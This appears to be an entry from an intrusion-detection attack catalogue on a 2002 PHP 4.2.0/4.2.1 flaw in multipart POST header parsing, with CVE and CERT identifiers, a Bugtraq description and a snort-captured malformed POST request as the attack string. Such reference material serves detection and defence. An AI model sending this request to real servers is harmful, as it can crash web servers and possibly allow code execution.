PHP HTTP POST Incorrect MIME Header Parsing

Against

Apache with mod_php on Linux, *BSD, Unix

IDs

CERT-Advisory: CA-2002-21
Bugtraq: 5278
CVE: CAN-2002-0717

Category

Input validation error

Effect

Denial of Service

Source

Captured with snort

Description

From the Bugtraq vulnerability database:

A vulnerability has been reported for PHP versions 4.2.0 and 4.2.1. It is possible for a remote attacker to cause the PHP interpreter to crash the web server on a vulnerable system and execute malicious, attacker supplied code.

The vulnerability is the result of the PHP interpreter incorrectly parsing MIME headers when HTTP POST commands are received. When PHP receives a malformed POST request, it generates an error condition that is improperly handled. As a result, the attacker may cause the web server to crash and possibly execute supplied code.

From the Bugtraq postings: This vulnerability may be exploitable on Sparc.

Attack string

POST hi.php HTTP/1.0
Referer: http://host/xxxxxx/exp.php?hi_lames=haha
Connection: Keep-Alive
Content-type: multipart/form-data; boundary=---------------------------135408810612827886801697150081
Content-Length: 567

-----------------------------135408810612827886801697150081
Content-Disposition: form-data; name=""

Attack program source

None available.